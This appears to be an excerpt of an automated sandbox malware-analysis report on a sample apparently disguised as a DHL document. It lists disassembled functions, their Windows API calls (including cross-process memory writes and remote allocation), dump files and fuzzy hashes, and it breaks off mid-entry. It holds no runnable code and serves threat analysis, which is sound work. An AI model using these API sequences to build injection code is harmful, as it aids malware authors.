                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007B134D
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B135C
                                                                                    • BeginPath.GDI32(?), ref: 007B1373
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B139C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: 91fc1b2a7fe5c407cb154769d4ffb9807122f881cac7629f6d3e4b1727a87b4f
                                                                                    • Instruction ID: 80ac8975484b02ce0c83c48bae109c93be6eccd7cba162c5f3d95ddc77028c4e
                                                                                    • Opcode Fuzzy Hash: 91fc1b2a7fe5c407cb154769d4ffb9807122f881cac7629f6d3e4b1727a87b4f
                                                                                    • Instruction Fuzzy Hash: 04218E30C00A08EBDB108F69DD587AA3BE8FB00721F984626F818975B5E3B4D891CF91
                                                                                    Function 0080BC9E Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memcmp
                                                                                    • String ID:
                                                                                    • API String ID: 2931989736-0
                                                                                    • Opcode ID: b57df1c9ba03dc74484afb099e3cb4bc953f9480596af40250166a9a6db9d3e9
                                                                                    • Instruction ID: fd24bb8c08cbda4f67b5c8913e9b89e8fefa5d311102164e9446bd8f649f1ee2
                                                                                    • Opcode Fuzzy Hash: b57df1c9ba03dc74484afb099e3cb4bc953f9480596af40250166a9a6db9d3e9
                                                                                    • Instruction Fuzzy Hash: 1801B57160410DBBE2046B116D82FBBB76CFF24398F484025FD15D6383FB58DE1082A0
                                                                                    Function 00814A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00814ABA
                                                                                    • __beginthreadex.LIBCMT ref: 00814AD8
                                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 00814AED
                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00814B03
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00814B0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                                    • String ID:
                                                                                    • API String ID: 3824534824-0
                                                                                    • Opcode ID: 88c950624fc4cd70fb61f35227b5b7264090ec5f3359fe556f45a189dfe804f4
                                                                                    • Instruction ID: d958cb413fd9d79536feefd69f20f8154506761f13e48a694aee5bae0a9840cb
                                                                                    • Opcode Fuzzy Hash: 88c950624fc4cd70fb61f35227b5b7264090ec5f3359fe556f45a189dfe804f4
                                                                                    • Instruction Fuzzy Hash: 8D112972908204BBC7019BA8AC08ADE7BACFF84324F144269F918D3351E674C94087E0
                                                                                    Function 00808202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0080821E
                                                                                    • GetLastError.KERNEL32(?,00807CE2,?,?,?), ref: 00808228
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00807CE2,?,?,?), ref: 00808237
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00807CE2,?,?,?), ref: 0080823E
                                                                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00808255
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: d8ea87cf5e3599789ddc3fbcf8304aa28c4235996914b10bad5f112e3e05d3c2
                                                                                    • Instruction ID: e02ff031f184e0a606e0b31aa05e0a1ff8cc32886fe42963caa1750b754e56b7
                                                                                    • Opcode Fuzzy Hash: d8ea87cf5e3599789ddc3fbcf8304aa28c4235996914b10bad5f112e3e05d3c2
                                                                                    • Instruction Fuzzy Hash: FE016D71601204FFDB205FA6EC48D6B7BACFF8A755B500829F949C2260DA318C50DAA0
                                                                                    Function 0080710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?,?,00807455), ref: 00807127
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807142
                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 00807150
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?), ref: 00807160
                                                                                    • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00807044,80070057,?,?), ref: 0080716C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: b1b8cdbf8aa66a281353a22a3197ed1cad654c5dcd03193e63dac889a9f22ae1
                                                                                    • Instruction ID: b76e45dad82bad8b2e13958c1fd7da01a287f483f3be98d37e7496e305b20444
                                                                                    • Opcode Fuzzy Hash: b1b8cdbf8aa66a281353a22a3197ed1cad654c5dcd03193e63dac889a9f22ae1
                                                                                    • Instruction Fuzzy Hash: 8C017C76A01208BBDB114F64DC44AAA7BBDFB88792F140479FE04D22A1E731ED41DBA0
                                                                                    Function 00815244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815260
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0081526E
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00815276
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00815280
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: cf9fec1d7b065161c0583b40d05b717a3abb69e560ddf70d265baa9b7a576b77
                                                                                    • Instruction ID: 4033f6887f6a87f1962baf6feae8ac3892a11beb13012f85310c822837407f49
                                                                                    • Opcode Fuzzy Hash: cf9fec1d7b065161c0583b40d05b717a3abb69e560ddf70d265baa9b7a576b77
                                                                                    • Instruction Fuzzy Hash: B2010532D02A1DDBCF00AFE4E8499EEBB7CFF89711F400556EA45F2151CB34599487A1
                                                                                    Function 0080810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00808121
                                                                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0080812B
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0080813A
                                                                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00808141
                                                                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00808157
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: b6cc5015a0cc6aa0c24b78c3cbad930decff29246c81bfc9e24f1db3c2f53bd9
                                                                                    • Instruction ID: 124bd6bbd54762f3e1291d8689d10f48dd4a64dcd26dff523dfd5a661ac6ed92
                                                                                    • Opcode Fuzzy Hash: b6cc5015a0cc6aa0c24b78c3cbad930decff29246c81bfc9e24f1db3c2f53bd9
                                                                                    • Instruction Fuzzy Hash: CCF06271600304FFEB521FA5EC88E6B3BACFF89754F000425FA85C61A1CB61DD55DAA0
                                                                                    Function 0080C1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0080C1F7
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0080C20E
                                                                                    • MessageBeep.USER32(00000000), ref: 0080C226
                                                                                    • KillTimer.USER32(?,0000040A), ref: 0080C242
                                                                                    • EndDialog.USER32(?,00000001), ref: 0080C25C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: aa05570e884a5409905dde82eb8d970656cf85fd55b117d95703056b18d5d479
                                                                                    • Instruction ID: 114038f5073fa9e542c0c459360663dfd3f4b8f1aa75787c7fa3f71eaf8c2eab
                                                                                    • Opcode Fuzzy Hash: aa05570e884a5409905dde82eb8d970656cf85fd55b117d95703056b18d5d479
                                                                                    • Instruction Fuzzy Hash: 16016230904708ABEB245F64ED4EB9677B8FF50B06F000A69B652E18F1DBE469549B90
                                                                                    Function 007B13B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 007B13BF
                                                                                    • StrokeAndFillPath.GDI32(?,?,007EB888,00000000,?), ref: 007B13DB
                                                                                    • SelectObject.GDI32(?,00000000), ref: 007B13EE
                                                                                    • DeleteObject.GDI32 ref: 007B1401
                                                                                    • StrokePath.GDI32(?), ref: 007B141C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: 823d281bdd4c939227ae6eac1f170e12dd0c7aa1bfb8862d33efcc953b32a95c
                                                                                    • Instruction ID: 9ed1777bb8b64674163705278b0c85b6cf82a51bd0b67900c156ab295c8b74b6
                                                                                    • Opcode Fuzzy Hash: 823d281bdd4c939227ae6eac1f170e12dd0c7aa1bfb8862d33efcc953b32a95c
                                                                                    • Instruction Fuzzy Hash: 6AF01930400A48EBDB155F2AED5C7993FA4F742326F988234E529490F6C7B489A5DF51
                                                                                    Function 007C2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007D0DB6: std::exception::exception.LIBCMT ref: 007D0DEC
                                                                                      • Part of subcall function 007D0DB6: __CxxThrowException@8.LIBCMT ref: 007D0E01
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                      • Part of subcall function 007B7A51: _memmove.LIBCMT ref: 007B7AAB
                                                                                    • __swprintf.LIBCMT ref: 007C2ECD
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 007C2D66
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 1943609520-557222456
                                                                                    • Opcode ID: 793ef01cf2255ad2661c581425d88d3c8b14b3e1b19fe02800debdaae7e5c5b2
                                                                                    • Instruction ID: e40bcf80f81e1d1eafdfffc33d238962819c3ac5c520b6b70dafbb8bbbf45137
                                                                                    • Opcode Fuzzy Hash: 793ef01cf2255ad2661c581425d88d3c8b14b3e1b19fe02800debdaae7e5c5b2
                                                                                    • Instruction Fuzzy Hash: 5F914A71108205DFC718EF28C889EAEB7B4EF85710F14491EF5959B2A2EA38ED45CB52
                                                                                    Function 0081B93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007B4743,?,?,007B37AE,?), ref: 007B4770
                                                                                    • CoInitialize.OLE32(00000000), ref: 0081B9BB
                                                                                    • CoCreateInstance.OLE32(00842D6C,00000000,00000001,00842BDC,?), ref: 0081B9D4
                                                                                    • CoUninitialize.OLE32 ref: 0081B9F1
                                                                                      • Part of subcall function 007B9837: __itow.LIBCMT ref: 007B9862
                                                                                      • Part of subcall function 007B9837: __swprintf.LIBCMT ref: 007B98AC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                    • String ID: .lnk
                                                                                    • API String ID: 2126378814-24824748
                                                                                    • Opcode ID: 111cb3837514b34f16a242b87c7aad04621f1d8397d3ae4a7d1eb0e9121e7838
                                                                                    • Instruction ID: cc844af39a5ef51e1a963b232fc0ce229f8b0e7417a32dfec8a6dffcfcf8270e
                                                                                    • Opcode Fuzzy Hash: 111cb3837514b34f16a242b87c7aad04621f1d8397d3ae4a7d1eb0e9121e7838
                                                                                    • Instruction Fuzzy Hash: B8A136756043059FC704DF14C484E9ABBE9FF89324F148958F9A99B3A1CB35EC85CB91
                                                                                    Function 007D501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 007D50AD
                                                                                      • Part of subcall function 007E00F0: __87except.LIBCMT ref: 007E012B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorHandling__87except__start
                                                                                    • String ID: pow
                                                                                    • API String ID: 2905807303-2276729525
                                                                                    • Opcode ID: 37320978c1328ebc0d695e43e4cc8882389567798f0d2038a1343678abf505f9
                                                                                    • Instruction ID: 217c0673abdcb4c3b3b7af31c3a4a0d2a5c308cf8f69dc409ad5c807648a4b24
                                                                                    • Opcode Fuzzy Hash: 37320978c1328ebc0d695e43e4cc8882389567798f0d2038a1343678abf505f9
                                                                                    • Instruction Fuzzy Hash: 5D51AB2090E646C7DB117739C84537E2BE4BB45300F248D5AE4D58A3A9EFBC8DC4DAC2
                                                                                    Function 007F8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: 3c|$_|
                                                                                    • API String ID: 4104443479-1588047251
                                                                                    • Opcode ID: 4ae07cf14a2d1c7ddc6d66ead22b8ac8e5e12c24c9b322839b8113c37d3b8bde
                                                                                    • Instruction ID: 2569ae9129928b1d2c0a14c001094bead8cfa107f6376ffd35f752024d3830db
                                                                                    • Opcode Fuzzy Hash: 4ae07cf14a2d1c7ddc6d66ead22b8ac8e5e12c24c9b322839b8113c37d3b8bde
                                                                                    • Instruction Fuzzy Hash: CD514C709006199FCB64CF68C894ABEBBB1FF44304F248529E95AD7350EB38E955CB51
                                                                                    Function 008097F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 008114BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00809296,?,?,00000034,00000800,?,00000034), ref: 008114E6
                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 0080983F
                                                                                      • Part of subcall function 00811487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008092C5,?,?,00000800,?,00001073,00000000,?,?), ref: 008114B1
                                                                                      • Part of subcall function 008113DE: GetWindowThreadProcessId.USER32(?,?), ref: 00811409
                                                                                      • Part of subcall function 008113DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,0080925A,00000034,?,?,00001004,00000000,00000000), ref: 00811419
                                                                                      • Part of subcall function 008113DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,0080925A,00000034,?,?,00001004,00000000,00000000), ref: 0081142F
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008098AC
                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008098F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                    • String ID: @
                                                                                    • API String ID: 4150878124-2766056989
                                                                                    • Opcode ID: 0cc56794e61f019d36c89203b9219b2c9372fbc74341d0d292ca19665bdda8ab
                                                                                    • Instruction ID: 23e7a472b6f9440b03f1b6f6d20a21fd4944914abdc8957470176d5f8056d8ae
                                                                                    • Opcode Fuzzy Hash: 0cc56794e61f019d36c89203b9219b2c9372fbc74341d0d292ca19665bdda8ab
                                                                                    • Instruction Fuzzy Hash: 4B413A76901218AECF10DFA4CD86ADEBBB8FF49700F004099FA55A7181DA706E85CBA1
                                                                                    Function 00837946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
